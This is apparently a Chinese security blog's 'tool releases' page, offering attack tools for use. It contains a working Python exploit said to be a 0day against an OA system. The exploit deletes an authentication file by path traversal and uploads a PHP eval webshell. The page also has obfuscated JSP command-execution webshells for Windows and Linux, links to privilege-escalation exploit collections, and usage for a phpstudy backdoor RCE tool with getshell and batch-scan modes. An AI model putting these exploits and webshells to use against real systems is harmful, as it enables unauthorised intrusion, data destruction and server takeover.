分类 工具发布 下的文章

看到漏洞的作者刚放出了EXP,目前应该还是0day。

Exp亲测可用:

1.png

2.png

target="http://127.0.0.1:1234/"
payload="<?php eval($_POST['hahaha']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[-]Failed to deleted auth.inc.php")
exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files)
url=target+"/_deconf.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
print("[+]Filed Uploaded Successfully")
print("[+]URL:",url)
else:
print("[-]Failed to upload file")

?cmd=whoami

windows版

<jsp:scriptlet>
if(\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072    \u0061\u006d\u0065\u0074\u0065\u0072("cmd") != \u006e\u0075\u006c\u006c){
\u0050\u0072\u006f\u0063\u0065\u0073\u0073 p = \u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e \u0067\u002e\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e \u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063("cmd.exe /c " + \u0072\u0065   \u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072("cmd"));
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d os = p.getOutputStream();
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d in = p.getInputStream();
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u0044\u0061\u0074\u0061\u0049\u006e\u0070\u0075 \u0074\u0053\u0074\u0072\u0065\u0061\u006d dis = new java.io.DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
out.println("\u0074\u0030\u0030\u006c\u0073\u0020\u0031\u0032\u0034\u0035\u0035");
</jsp:scriptlet>

Linux版

<jsp:scriptlet>
if(\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061  \u006d\u0065\u0074\u0065\u0072("cmd") != \u006e\u0075\u006c\u006c){
\u0050\u0072\u006f\u0063\u0065\u0073\u0073 p = \u006a\u0061\u0076\u0061\u002e\u006c\u0061 \u006e\u0067\u002e\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075 \u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063(\u0072\u0065\u0071\u0075 \u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072("cmd"));
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d os = p.getOutputStream();
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d in = p.getInputStream();
\u006a\u0061\u0076\u0061\u002e\u0069\u006f\u002e\u0044\u0061\u0074\u0061\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d dis = new java.io.DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); disr = dis.readLine(); }
}
out.println("\u0074\u0030\u0030\u006c\u0073\u0020\u0031\u0032\u0034\u0035\u0035");
</jsp:scriptlet>

项目地址:https://github.com/lyshark/Windows-exploits

1.png

2.png

3.png

4.png

5.png

Windows平台提权漏洞集合

项目地址:https://github.com/SecWiki/windows-kernel-exploits

6.png

各大平台提权工具

项目地址:https://github.com/klsfct/getshell

7.png

Windwos辅助提权脚本

项目地址:https://github.com/ianxtianxt/win-exp-

8.png

SweetPotato修改版,用于webshell下执行命令

项目地址:https://github.com/uknowsec/SweetPotato

9.png

Webshell下提权执行命令

项目地址:https://github.com/uknowsec/getSystem

10.png

Linux平台提权漏洞集合

https://github.com/s0wr0b1ndef/Linux-Kernel-Exploites

0x00 概述

20190920 phpstudy爆出存在后门,该软件官网在2016年被入侵,软件安装包(php_xmlrpc.dll)被植入后门,利用http请求头的Accept-Encoding: gzip,deflate和'Accept-Charset'可造成远程代码执行。

本工具支持单url检测,cmdshell,get web shell(写入一句话木马),批量检测。

0x01 需求

python2.7
pip install requests

0x02 快速开始

使用帮助: python phpstudy-backdoor-rce.py -h

1.png

单url漏洞检测: python phpstudy-backdoor-rce.py -u "http://www.xxx.com/"

2.png

cmdshell: python phpstudy-backdoor-rce.py -u "http://www.xxx.com/" --cmdshell

3.png

getshell: python phpstudy-backdoor-rce.py -u "http://www.xxx.com/" --getshell --web-path WWW

4.png

批量检测: python phpstudy-backdoor-rce.py -f urls.txt

5.png

phpstudy-backdoor-rce.zip